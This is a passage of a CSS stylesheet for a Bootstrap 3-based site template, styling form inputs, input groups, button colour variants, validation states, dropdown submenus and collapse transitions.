input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0px;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0px 0px 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0px 0 0 0px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0px 0 0 0px;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0px 0px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0px 0 0 0px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  padding: 0;
  margin: 0;
  border: 0;
  min-width: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: bold;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: none;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"],
  input[type="time"],
  input[type="datetime-local"],
  input[type="month"] {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: normal;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-left: -20px;
  margin-top: 4px \9;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  vertical-align: middle;
  font-weight: normal;
  cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.form-control-static {
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
  min-height: 34px;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.form-group-sm .form-control {
  height: 30px;
  line-height: 30px;
}
textarea.form-group-sm .form-control,
select[multiple].form-group-sm .form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  min-height: 32px;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.form-group-lg .form-control {
  height: 45px;
  line-height: 45px;
}
textarea.form-group-lg .form-control,
select[multiple].form-group-lg .form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  min-height: 38px;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  border-color: #468847;
  background-color: #dff0d8;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  border-color: #c09853;
  background-color: #fcf8e3;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  border-color: #b94a48;
  background-color: #f2dede;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -15px;
  margin-right: -15px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    text-align: right;
    margin-bottom: 0;
    padding-top: 7px;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 15px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 14.3px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  white-space: nowrap;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  outline: 0;
  background-image: none;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  pointer-events: none;
  opacity: 0.65;
  filter: alpha(opacity=65);
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:hover,
.btn-default:focus,
.btn-default.focus,
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary.focus,
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-primary .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:hover,
.btn-success:focus,
.btn-success.focus,
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:hover,
.btn-info:focus,
.btn-info.focus,
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning.focus,
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger.focus,
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  color: #cc0000;
  font-weight: normal;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #800000;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: 'Glyphicons Halflings';
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot');
